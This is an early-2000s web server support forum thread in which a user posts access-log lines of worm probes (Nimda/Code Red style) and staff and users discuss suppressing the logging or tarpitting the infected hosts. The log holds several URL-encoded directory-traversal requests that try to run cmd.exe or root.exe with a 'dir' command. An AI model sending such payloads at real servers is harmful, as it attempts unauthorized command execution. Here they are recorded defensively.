View previous topic :: View next topic |
Author |
Message |
POMP -
Joined: 04 Apr 2002 Posts: 15 Location: Houston, TX
|
Posted: Sat Apr 06, 2002 10:34 pm Post subject: Is anyone else getting hammered like this? |
|
|
When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?
Here is a portion of my access.log so you can see what I'm talking about:
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:37 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:07:55:40 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:27 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:28 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:29 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:28:30 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:23 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:24 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:08:30:25 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:56 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 438 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" ""
66.24.164.131 - - [06/Apr/2002:09:26:58 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 436 "" "" |
|
Back to top |
 |
 |
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Sun Apr 07, 2002 2:01 am Post subject: Is anyone else getting hammered like this? |
|
|
POMP wrote: |
When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?
|
Unfortunatly, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It responds always with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not to log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials. _________________ Support Team
Aprelium - http://www.aprelium.com |
|
Back to top |
|
 |
decrepidloser -
Joined: 24 Oct 2002 Posts: 2
|
Posted: Thu Oct 24, 2002 11:33 pm Post subject: Re: Is anyone else getting hammered like this? |
|
|
[quote="aprelium"][quote="POMP"]
When I view my access log, I get repeated break-in attempts by what I can only assume are PC's or IIS servers that have been infected with Nimda or Code Red. Does anyone know of a way to perhaps slow this activity down a bit?
[/quote]
Unfortunatly, there are always people attempting to discover broken IIS servers.
The good news is that Abyss Web Server isn't affected by such attacks. It responds always with a "404 Not found" error.
The less good news is that there is no way to filter these attacks and not to log them. Our advice is to disable logging if you notice that your file gets huge after a few minutes of use due to multiple attack trials.[/quote]
Well, is there a way to redirect the requestted urls or files to another site? ie www.microsoft.com , so maybe they will fix there broken server. |
|
Back to top |
|
 |
aprelium -
Joined: 22 Mar 2002 Posts: 6800
|
Posted: Fri Oct 25, 2002 11:31 am Post subject: Re: Is anyone else getting hammered like this? |
|
|
decrepidloser wrote: | Well, is there a way to redirect the requestted urls or files to another site? ie www.microsoft.com , so maybe they will fix there broken server. |
This is an idea we can consider :wink:
But, in order to solve this problem. we will provide Abyss Web Server (in a future version) with a mechanism that stops logging such requests (and of course, it will continue to deny them as it already does). _________________ Support Team
Aprelium - http://www.aprelium.com |
|
Back to top |
|
 |
aharcup -
Joined: 28 Feb 2003 Posts: 1
|
Posted: Fri Feb 28, 2003 2:52 pm Post subject: Checkout Labrea |
|
|
Labrea can really tie up the resources of the infected NIMDA server.
Checkout http://www.hackbusters.net/LaBrea/ to find out more.
I have used this piece of code and it rocks.
Andy
:D |
|
Back to top |
|
 |
|